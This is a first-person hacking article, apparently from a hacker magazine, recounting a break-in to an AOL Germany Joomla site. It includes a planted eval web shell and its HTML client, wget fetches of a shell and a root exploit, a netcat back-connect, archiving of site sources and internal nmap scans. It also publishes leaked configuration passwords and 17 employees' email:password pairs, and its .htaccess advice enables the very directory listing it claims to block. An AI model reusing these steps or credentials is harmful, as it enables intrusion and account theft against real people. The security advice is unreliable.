Knocked-Out AOL: How The AOL Servers Were Hacked

AOL Corporation has always been a kind of honey pie for all possible kinds of
hackers. Millions of AIM, AOL Mail and ICQ registered users, hundreds of offices
all around the world, one billion advertising market and other stuff you can
check out directly from the aol.com home page, which enters the Top 50 websites
attendance list all around the internet.

Looking at all this magnificence you won’t be surprised that one day I’ve
forwarded my XSpider 7.7 to one of the AOL networks in the range of 64.12.0.0 -
64.12.255.255. So here's how the things turned out...

Victim detected

Out of a rich variety of corporation IP addresses considering the specified
range, the alex-aolde-mtc02.evip.aol.com was the first one to attract my
attention. After some detailed inspection it turned out to be a certain website
- http://alex.aol.de, having its own windows login and password home page. Then,
after giving a first glance, it became clear the website is based on Joomla CMS
1.5.x.

As you know, one of today's best solutions for searching vulnerabilities in
Joomla based websites is "Joomla! Security/Vulnerability Scanner" which is
included in the OWASP Project created by the guys from YGN Ethical Hacker Group.
So, after downloading the scanner, I’ve launched it as follows:

C:/Perl/bin/perl5.12.1.exe C:/joomscan/joomscan.pl -u
http://alex.aol.de

A few minutes later I got a following result:

* Deduced version range is : [1.5.12 - 1.5.14]
...
# 14
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a
specially crafted webpage.
Vulnerable? Yes
...
# 19
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact
there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes

None of the "vulnerabilities" that were found didn’t help me become closer to
the cherished goal of hacking the website.

Help from OWASP

Realizing that Joomla just won’t help me to get access to the necessary
server I decided to scan all website’s directories and files, which are hidden
from prying eyes, by using another OWASP project – DirBooster directories
brootforce software.

After launching the program I’ve set the following settings:

Target URL: http://alex.aol.de/;
Work Method: Auto Switch (HEAD and GET);
Number Of Threads: 200;
Select starting options: Standard start point, Brute Force Dirs, Brute Force
Files;
File extension: php.

Then I tried to apply the bruteforce software with all standard dictionaries
included.

I was the most pleased by the following results: ./info.php (phpinfo), ./pma
(phpMyAdmin) and ./dnld directory containing three really nice files (configuration.php,
phpMyAdmin-3.3.2-english.tar, wirwarendrin.tar).

80 Mb wirwarendrin.tar archive made me happy as the alex.aol.de homepage has
a link to wirwarendrin.de, which is a kind of AOL resource’s mirror.

After downloading the specified file I explored it includes a full backup of
our website :).

Save your backups in a savings bank!

While browsing the backup archive I was the most interested in Joomla
configuration file named configuration.php. That file contained the following
interesting things:

<?php
class JConfig {
...
var $secret = 'NAAgXewXco6BSw2d';
...
var $host = 'localhost';
var $user = 'alex';
var $db = 'test';
...
var $smtpport = '465';
var $smtpuser = 'wirwarendrin';
var $smtppass = 'Briesben';
var $smtphost = 'smtp.aol.com';
...
var $password = 'wjedko,lg';
...
}
?>

The first thing I did was getting into the wirwarendrin@aol.com mailbox,
which, as it turned out, was a mailbox for all alex.aol.de users registration
data to be sent to. Then, it seemed logical to try the MySQL username and
password for phpMyAdmin. Actually, I have done that at once :).

Of course, the password for “alex” user was correct, so I had two choices for
shell upload: new Joomla administrator adding or bruteforcing the existing
administrator password. I chose the second option.

Quick and easy bruteforce!

My favorite bruteforce software is PasswordsPro which is suitable for
different types of hashes, and supports the Joomla password encryption format -
Md5 ($ pass. $ Salt).

Thus, after downloading some rather large dictionaries and adding them to
PasswordsPro library I started my patient waiting for the brutforcer to find the
salty admin hash
d86f4c81342b79c4bab8868656cabe46:t65HKT9iuoOUdvfIAD0JP0ynT6EpRHXb.

After several hours of bruteforce processing the utility gave me the
“qwertyzuaor” password for the above hash. I’ve successfully logged into
alex.aol.de, as well as the alex.aol.de/administrator.

By the way, as it turned out, the alex.aol.de website was created by one of
the AOL employees and its purpose was German AOL Corporation branch staff party
coordination. There were about 450 former and current employees of AOL
registered to get on the inside of the set out. So, I started uploading the
shell by modifying the Joomla template 🙂

AOL Inside

The template to edit was located at the admin area: "Extensions -> Template
Manager -> aol-exit -> Edit HTML". The template file itself was here /data/servers/wahl-o-mat_aol_de
/pages/alex_aol_de/templates/aol-exit/index.php. I’ve inserted a small Kawai
construction at the top of the template file:

<?php
eval(stripslashes($_REQUEST[aaa]));
?>

It remained only to create some HTML-Client for that stuff:

<form action="http://alex.aol.de/templates/aol-exit/index.php" method="POST">
<input type="text" name="aaa"/>
<input type="submit" value="Pwn It!"/>
</form>

The first thing I did was uploading a WSO-shell to server with the wget
utility. I placed it directly to the templates directory and named it as 404.php
so I was able to comfortably browse all the files and directories (by the way,
another admin sin was keeping absolutely all files and directories open for
writing).

Getting deeper!

The /data/servers directory made it possible to browse all alex.aol.de
neighbor sites: editor.aol.fr, gat.aol.co.uk, sns.nexus.aol.com,
wahl-o-mat.aol.de, matrix.aol.de. I didn’t want to penetrate with their
structure and meaning, so I simply downloaded all those websites sources to my
VDS HDD having all that stuff pre-packed by the following command:

cd /data/servers;tar czvf /tmp/1.tgz ./*

Another goal I set for myself was getting the root access for that server.
The good thing was that an old and dull kernel allowed that action:

Linux wahl-o-mat.aol.de 2.6.9-55.ELsmp #1 SMP Fri Apr 20 17:03:35 EDT
2007 i686

I needed some interactive shell to start. I got it by banal Perl Back-connect
to the 31337 port of my VDS in WSO (Network section) which became a NetCat
byword:

c:/netcat/nc.exe -l -p 31337

After obtaining the required things I started searching the
http://www.exploit-db.com
for the corresponding root exploit. The one I found was, again, kind of German
made "wunderbar
emporium". Then, after giving a straightforward sequence of commands I got
the coveted "uid = 0 (root) gid = 0 (root) groups = 11560 (httpd)":

wget http://www.grsecurity.net/~spender/wunderbar_emporium.tgz;tar xzfv
wunderbar_emporium.tgz;chmod 0777 ./*;./wunderbar_emporium.sh

Interesting

After obtaining the root access rights I wanted to scan the internal network
for some reason. I ran the ifconfig command and found out that server has the
10.62.134.80 IP address within our network. So the next thing I did was
downloading and installing the nmap with rpm:

rpm -vhU http://nmap.org/dist/nmap-5.21-1.i386.rpm

and running it as follows::

nmap -v -n -sS 10.62.134.0/24

Now I'm not going to talk about all further actions I made to German AOL
network, but I will show a couple of the most interesting scanner reports:

Nmap scan report for 10.62.134.89
Host is up (0.00013s latency).
Not shown: 986 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
1024/tcp open kdm
1041/tcp open unknown
1051/tcp open optima-vnet
1311/tcp open rxmon
1801/tcp open unknown
2099/tcp open unknown
2103/tcp open zephyr-clt
2105/tcp open eklogin
2107/tcp open unknown
3389/tcp open ms-term-serv
MAC Address: 00:18:8B:74:52:6E (Dell)
...

Nmap scan report for 10.62.134.96
Host is up (0.00013s latency).
Not shown: 971 closed ports
PORT STATE SERVICE
22/tcp open ssh
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1024/tcp open kdm
1025/tcp open NFS-or-IIS
1027/tcp open IIS
1078/tcp open unknown
1112/tcp open msql
1311/tcp open rxmon
1801/tcp open unknown
2099/tcp open unknown
2103/tcp open zephyr-clt
2105/tcp open eklogin
2107/tcp open unknown
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-term-serv
9998/tcp open unknown
13722/tcp open netbackup
13782/tcp open netbackup
13783/tcp open netbackup
49152/tcp open unknown
49153/tcp open unknown
MAC Address: 00:13:72:5A:3E:78 (Dell)

As you see, AOL is fond of Microsoft products :).

AOL Confidential

That’s it for today with a troubled AOL internal network and I suggest you to
continue with usernames and password hashes of corporation employees I’ve pulled
out from the Joomla CMS database. As I wrote above, PasswordsPro software had
really helped me to decrypt the alex.aol.de administrator password hash.
Nevertheless, I decided not to limit myself with the admin password alone, so I
started bruteforcing the remaining 450 accounts. Actually, I’ve successfully
bruteforced 197 of them. Then I started to quietly check those passwords to
match the AOL staff’s email passwords. Here are some interesting live accounts:

guenterstaar guenterstaar@aol.com:keiness
thomaskuck thomaskuck@aol.com:sascha
mdfreedom99 marcdrewello@aol.com:Magic23
ClaudiaLangwald ClaudiaLangwald@aol.com:Silvera
bettyvonloesch bettyvonloesch@aol.com:hanne
Pierre PierreBeneHH@aol.com:wombast
Tenge Tenge@aol.com:derwis
JennySefkow JennySefkow@aol.com:varita
NinaRixenHH@aol.com NinaRixenHH@aol.com:brauere
Jennifer2706 jennifermatheja@aol.com:elite15
A.V.aus H. voigthh@googlemail.com:Delphines
fkorupp frederickorupp@googlemail.com:wasistdas
KrassowskiSabine@aol.de KrassowskiSabine@aol.de:Sommer44
neddie annettharksenhh@aol.de:hochzeis
Trixi seebertrixi@aol.de:sommer07
tringasvassiliki tringasvassiliki@aol.de:perikle
AgnesAB agnesboltzenhh@aol.de:April2008

As you see, passwords simplicity can easily blow one’s mind :).

I’ve found a lot of really entertaining documents in those mailboxes, such as
internal AOL receipts, employees’ summary, photographs of offices, different
addresses and phone numbers, some ebay and paypal passwords (!) and some
statistics, etc.

Here is just a part of one of the internal document marked as "Company
Confidential".

AOL Germany SNAPSHOT SUMMARY as of COB
Date : [2006-02-11]
Business :
AOL
GERMANY (AOL)
FOR [2006-02-11]
-Ending Members 2,687,173
-Registrations 1,824
-Reactivations 146
-Overhead Conversions 1
-Cancellations 1,472
-Terminations 549
-Net Change -50
-Customer Hours 7,301,418
-Total Hours 7,322,081

Apparently, these statistics contain full information on the internal user
turnover of German AOL corporation branch under 11/02/2006 :).

Last thing

You’ve become a spectator of another large company website hack story evolve
process. It occurred due to banal carelessness and inattention of website
administrator. I can mention a few fundamental factors: public accessible
storage backup, external user’s accessible phpMyAdmin, the old kernel, files and
directories recording openness and some really predictable passwords. I hope you
will never repeat those really stupid mistakes the AOL workers did after reading
this opus :).

INFO:

In order to protect your website internal directories from prying eyes, I
advise you to put the .htaccess file containing a single line in every sensitive
directory:

Options +Indexes

In order to protect all directory files from any outside access add several
more thing to .htaccess file:

Order Deny, Allow
Deny from all

DANGER

The above article is the product of the author’s diseased imagination. Any
overlap with existing site is accident. Neither the editors nor the author shall
not be liable for any possible damages caused by the materials of this article.